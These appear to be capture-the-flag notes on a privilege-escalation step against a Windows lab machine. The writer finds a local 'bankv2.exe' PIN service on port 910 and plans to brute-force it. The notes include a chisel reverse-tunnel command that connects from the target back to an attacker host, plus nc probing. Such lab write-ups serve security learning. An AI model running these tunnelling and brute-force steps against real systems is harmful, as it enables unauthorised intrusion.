5 privesc bankv2.exe

# bankv2.exe shows up as a running process; look up its PID
C:\Users\Public>tasklist | find "bankv2.exe"
tasklist | find "bankv2.exe"
bankv2.exe                    1608                            0        132 K

# PID=1608
C:\Users\Public>netstat -anop tcp | find "1608"
netstat -anop tcp | find "1608"
  TCP    0.0.0.0:910            0.0.0.0:0              LISTENING       1608
  

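# Cannot connect to port 910 from Kali, even though netstat shows it bound to 0.0.0.0
# (presumably inbound traffic to that port is filtered).
# After transferring nc to the target, a local connection to 127.0.0.1:910 works.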

C:\Users\Public>nc -vn 127.0.0.1 910
nc -vn 127.0.0.1 910
(UNKNOWN) [127.0.0.1] 910 (?) open

 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 6969
 [!] Access denied, disconnecting client....

too many output retries: CONNABORTED
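# It's a 4-digit PIN (only 10,000 possible values), so let's brute-force it.
# The service just disconnects on a wrong PIN; no lockout is visible in this output.
# Port forwarding is needed first so the service can be reached from Kali.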

# server (on Kali): listen on port 8000 and allow reverse port forwards
$ chisel server -p 8000 --reverse

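# client (on the target): connect back to the chisel server and expose the
# target's 127.0.0.1:910 as port 910 on the server side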
C:\Users\Public>chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
2021/10/01 00:50:36 client: Connecting to ws://10.10.16.7:8000
2021/10/01 00:50:37 client: Connected (Latency 70.632ms)
